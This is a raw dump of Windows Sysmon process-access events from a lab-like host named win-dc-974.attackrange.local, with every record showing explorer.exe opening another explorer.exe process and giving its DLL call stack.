16:54:29.674{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241366Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.674{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241365Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.674{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241364Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.673{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241363Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.673{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241362Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.673{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241361Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.673{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241360Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.673{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241359Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.673{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241358Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.673{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241357Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.673{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241356Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.672{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241355Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.672{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241354Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.672{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241353Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.672{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241352Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.672{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241351Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.672{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241350Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.672{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241349Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.672{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241348Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241347Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241346Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241345Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241344Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241343Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241342Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241341Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241340Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241339Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 